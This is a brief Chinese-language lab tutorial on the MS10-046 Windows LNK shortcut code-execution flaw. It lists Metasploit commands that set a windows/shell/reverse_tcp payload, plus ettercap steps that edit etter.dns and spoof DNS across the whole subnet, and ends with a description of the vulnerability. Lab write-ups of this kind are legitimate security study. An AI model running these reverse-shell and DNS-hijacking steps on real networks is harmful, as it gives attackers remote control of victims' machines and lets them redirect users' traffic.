ms10-046漏洞

ms10-046漏洞攻击

实验过程

  • 1.通过命令: ipconfigifconfig 确认攻击机和靶机在同一网段
  • 2.通过ping命令确认靶机存活。
  • 3.通过命令: msfconsole启用msf。
  • 4.攻击。
    • 1.搜索漏洞,命令: search ms10-046。通过use使用漏洞。
    • 2.设置主机监听地址,命令:set srvhost 本机ip地址
    • 3.设置攻击机地址,命令:set lhost 本机ip
    • 4.加载攻击载荷,命令:set payload windows/shell/reverse_tcp
    • 5.进行攻击:exploit/run
  • 5.配合使用ettercap进行dns欺骗。在文件最后添加*.com A 本机ip

    cd /etc/ettercap

    ls

    vim etter.dns

  • 6.开启ettercap劫持整个网段,命令:ettercap -T -q -i eth0 -P dns_spoof ////
  • 7.劫持成功

漏洞描述:

Microsoft Windows快捷方式LNK文件自动执行代码漏洞

Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所制定的目标具有相同效果。Windows没有正确的处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在的位置就足以触发这个漏洞

受影响系统包括:Windows XP SP3/SP2、Vista SP2/SP1、Server 2008 R2/SP2和Windows 7

原文地址:https://www.cnblogs.com/Mrwuhuai/p/12164288.html